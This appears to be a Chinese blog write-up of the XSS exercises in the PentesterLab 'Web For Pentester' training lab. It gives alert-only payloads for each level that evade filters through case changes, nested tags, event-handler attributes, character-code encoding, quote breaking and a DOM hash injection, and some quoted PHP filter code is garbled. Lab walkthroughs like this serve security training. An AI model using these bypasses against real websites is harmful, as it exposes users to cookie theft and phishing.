Web For Pentester靶场

Web For Pentester靶场

镜像下载大小172mb
https://pentesterlab.com/exercises/web_for_pentester/attachments

第一关xss
xss危害
网络钓鱼
盗取cookies信息
劫持用户浏览器
弹出广告页面，刷流量
网页挂马
提升权限，进一步渗透
键盘监听（https://blog.csdn.net/weixin_44720762/article/details/89766484）
类型
反射性xss（非持久型）
存储型xss （持久型）
dom xss
0x01

没有任何过滤直接弹

0x02
/","", $name); $name = preg_replace("/</script>/","", $name); echo $name; ?>
仔细看了一下大小写绕过
preg_replace 函数来过滤标签由于没有考虑大小所以大小写转换绕过

0x03
/i","", $name); $name = preg_replace("/</script>/i","", $name); echo $name; ?>
<scscript>
0x04

Hello
这里只好使用其他标签绕过
<img src=x onerror=alert('XSS')>
0x05

Hello
编码绕过

String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 88, 83, 83, 39, 41)
0x06

";alert('XSS');"
";alert('XSS');//
0x07

';alert('XSS');'
';alert('XSS');//

0x08

Your name: 利用下面的传参 get的形式去 /">// /" onclick=alert('XSS')//
0x09

http://192.168.1.6/xss/example9.php#<script>alert('XSS')</script>
这个可能利用不成功换浏览器
相关阅读:
面试中AOP这样说，面试官只有一个字：服！
Spring第三天，详解Bean的生命周期，学会后让面试官无话可说！
Spring第二天，你必须知道容器注册组件的几种方式！学废它吊打面试官！
C#一些基础知识回顾
 关闭WiN10自动更新和后台程序。
python脚本显示运行进程
 选择pyqt5理由
 anaconda3下64位python和32位python共存
 爬取百度搜索信息
 python尝试windows在用端口
原文地址：https://www.cnblogs.com/doqingTeenager/p/15042708.html